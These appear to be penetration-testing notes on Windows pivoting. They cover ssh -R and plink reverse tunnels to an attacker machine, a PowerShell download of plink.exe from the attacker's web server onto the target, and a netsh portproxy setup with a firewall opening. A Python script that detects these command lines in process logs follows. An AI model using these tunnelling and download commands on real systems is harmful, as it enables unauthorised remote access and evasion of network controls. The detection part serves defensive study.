2. Windows Port Forwarding
- OpenSSH has shipped with Windows since April 2018
- On machines with SSH installed you will find scp.exe, sftp.exe, ssh.exe, etc. in %systemdrive%\Windows\System32\OpenSSH
SSH Remote Dynamic Port Forwarding:
- Start SSH server on attacker machine:
sudo systemctl start ssh
- Locate ssh.exe in cmd on target:
where ssh
- Check version of ssh:
ssh.exe -V
- Set up port forwarding:
ssh -N -R 2345 crabfeather@192.168.45.180
- Use with proxychains and win!
Plink.exe Remote Port Forwarding + RDP binding:
- Download the plink.exe binary to the target:
#Start server:
sudo systemctl start apache2
#Download binary:
powershell wget -Uri http://192.168.45.X/plink.exe -OutFile C:\Windows\Temp\plink.exe
- Start port forwarding (use Windows' loopback IP and its listening RDP port to be able to use RDP from Kali):
cmd.exe /c echo y | C:\Windows\Temp\plink.exe -ssh -l <kaliuser> -pw <kalipassword> -R 127.0.0.1:2345:<outip>:<outport> <kali-ip>
Example: port forwarding using Windows' loopback IP and its listening RDP port, so that RDP can be used from Kali:
cmd.exe /c echo y | C:\Windows\Temp\plink.exe -ssh -l <kaliuser> -pw <kalipassword> -R 127.0.0.1:4455:127.0.0.1:3389 <kali-ip>
Netsh local port forwarding + firewall poking:
- Requires administrative privileges
- Set up port forwarding:
netsh interface portproxy add v4tov4 listenport=2222 listenaddress=192.168.230.64 connectport=22 connectaddress=10.4.230.215
- Confirm it is working:
netsh interface portproxy show all
- Poke hole in firewall (inbound allow rule for the listening port):
netsh advfirewall firewall add rule name="port_forward_ssh_2222" protocol=TCP dir=in localip=192.168.230.64 localport=2222 action=allow
- Delete rules afterwards:
netsh interface portproxy del v4tov4 listenport=2222 listenaddress=192.168.230.64
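Detection side of the three techniques above, as an added example that is not part of the original notes: it flags ssh/plink -R forwards and netsh portproxy/firewall additions in process-creation command lines (for instance from Windows event 4688 or Sysmon event 1). The function names and the sample command lines are constructed for illustration.

```python
import ntpath
import re

R_OPT = re.compile(r"^-[46AaCfGgKkMNnqsTtVvXxYy]*R(.*)$")  # -R, -NR, -R2345
# Constructed command lines modelled on the notes above (addresses are samples).
SAMPLES = [
    r"ssh -N -R 2345 user@203.0.113.10",
    r"cmd.exe /c echo y | C:\Windows\Temp\plink.exe -ssh -l user -pw x "
    r"-R 127.0.0.1:4455:127.0.0.1:3389 203.0.113.10",
    "netsh interface portproxy add v4tov4 listenport=2222 "
    "listenaddress=192.0.2.64 connectport=22 connectaddress=198.51.100.215",
    'netsh advfirewall firewall add rule name="fwd" protocol=TCP dir=in '
    "localport=2222 action=allow",
]

def tokens(cmdline):
    """Split on whitespace, keeping double-quoted strings as one token."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]

def reverse_spec(args):
    """Return the argument of the first -R option, or None if there is none."""
    for i, arg in enumerate(args):
        m = R_OPT.match(arg)
        if m:
            return m.group(1) or (args[i + 1] if i + 1 < len(args) else "")
    return None

def classify(cmdline):
    """Return (technique, detail) findings for one process-creation command line."""
    toks, found = tokens(cmdline), []
    for i, tok in enumerate(toks):
        exe = ntpath.basename(tok).lower().removesuffix(".exe")
        args = toks[i + 1:]
        low = [a.lower() for a in args]
        if exe in ("ssh", "plink") and (spec := reverse_spec(args)) is not None:
            # [bind:]port opens a SOCKS proxy; [bind:]port:host:hostport a fixed target
            kind = "dynamic" if spec.count(":") < 2 else "static"
            found.append((f"{exe}_reverse_{kind}", spec))
        elif exe == "netsh" and "add" in low:
            kv = dict(a.split("=", 1) for a in low if "=" in a)
            if "portproxy" in low:
                found.append(("netsh_portproxy_add", kv))
            elif "advfirewall" in low and (kv.get("dir"), kv.get("action")) == ("in", "allow"):
                found.append(("netsh_firewall_allow_in", kv.get("localport")))
    return found

if __name__ == "__main__":
    print(*map(classify, SAMPLES), sep="\n")
```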